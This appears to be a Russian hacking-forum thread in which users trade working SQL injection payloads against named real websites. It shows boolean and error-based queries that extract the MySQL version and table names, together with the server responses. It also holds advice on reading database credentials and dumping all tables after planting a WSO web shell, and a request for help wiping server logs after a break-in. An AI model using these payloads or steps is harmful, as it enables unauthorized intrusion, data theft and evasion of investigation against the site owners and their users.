У меня вот это никак не крутится ни руками, ни софтом. Там вообще есть что-нибудь? Code: http://develop.belta.by/{тут инъекция, видно через ОПЕРУ} структура запроса Code: GET /1'"1000 HTTP/1.1 User-Agent: 1'"2000 referer: 1'"3000 client-ip: 1'"4000 x-forwarded-for: 1'"5000 accept-language: 1'"6000 via: 1'"7000 Cookie: PHPSESSID=4f4eba22b01c675b1c8b035f10e977ed Host: develop.belta.by Connection: Keep-alive Accept-Encoding: gzip,deflate Это ошибка вываливается в order by? Code: Ошибка при работе с базой данных. Пожалуйста, обратитесь к администратору. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
думаю это было утверждение, нежели вопрос) софтом не будет крутится, так как параметра уязвимого нет. Ну по крайней мере с sqlmap я не пробовал такое вытворять с order by будет крутиться только если это не error based + 5 версия mysql. В остальных случаях прийдется использовать другие параметры или другой набор слов. Попробуй использовать как параметр phpsessid, то есть сайт/1'&PHPSESSID=значение' и суй куда нибудь типа того же sqlmap. может поможет
asiaman Скуля там в URI. http://develop.belta.by/1'or(substring(version(),1,1)=5)and'1 - TRUE (Главная страница) http://develop.belta.by/1'or(substring(version(),1,1)=4)and'1 - FALSE (<##title>) Пробелы в такой скуле использовать нельзя, версия меньше, чем 5.1 (нету ф-ции ExtractValue). Вывод версии в ошибке: http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'1 Duplicate column name '5.0.88-log' t3cHn0iD Нет.
URL encode: http://www.intersport.ru/products/cat/?cat_group_id=24&cat_producer_id=&id=149+or+1+%67%72%6F%75%70+by+concat(%20(%73%65%6C%65%63%74%20table_name+%66%72%6F%6D+information_schema.tables+limit+17,1),floor(rand(0)*2))%20having%20min(0)--+ -> 1062Duplicate entry 'banners1' for key 1
Помогите, пожалуйста. После после пост запроса email=%5c&pass=451&x=31&y=9 выдается ошибка: SQL Error(1064): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 1' at line 1.[SELECT * FROM `member_account` WHERE email = '\' LIMIT 1] как раскрутить?
залил шелл wso на сайт. как теперь можно попасть в phpmyadmin или узнать данные от него? мне нужно скачать все таблицы с сайта
посмотри в папках есть ли он вобще, просмотри файли на хостинге, в какомто из них должен лежать скрипт для подключения к БД, там ты найдёшь логин пароль и тд. если нет phpmyadmin, то можно написать за 2 минуты простейшый скрипт для слива нужных таблиц,
Идёшь в скрипт с которого начинается процесс отдачи статики пользователю. Ищешь там(или в инклюдах) логин и пароль к базе. Заодно посмотри хост куда идёт подключение.
Тебе нужен скрипт настроек, это просто либа с функциями. Ищи файл, в котором происходит инклюд этого скрипта. Выше строки инклюда (хз насколько выше) должен быть или инклюд конфига (посмотри разные вариации слова "настройки" на английском), или сами настройки подключения к бд.
Мде... PHP: $version='MySQL RST/GHC Manager 2.3'; $copyright='© RusH Security Team © Antichat edition ©'; Сайт до тебя хекали уже. В index.php ищи инклюд конфига или кидай сюда.
почему это хекали? может просто версия базы данных античатовская? или я что то не понимаю? нах в конфиге писать про ачат. про какой индекс ты говоришь? главную страницу сайта? там есть обращение к базе?
В общем, по своей дурости, сегодня взломал сайт не включив впн Залил шелл, погулял по папкам, заливал файлы, читал файлы, скачивал. После завершения работы естественно решил вырубить впн, но как оказалось он не был включен... Как мне почистить логи, особенно со своим ip? +++ Если не там запостил, извините, не знал куда можно запостить. Эри, они вроде делали всякие скрипты, посмотри на хакер.ру, там есть какое-то скучное интервью с участником rht.
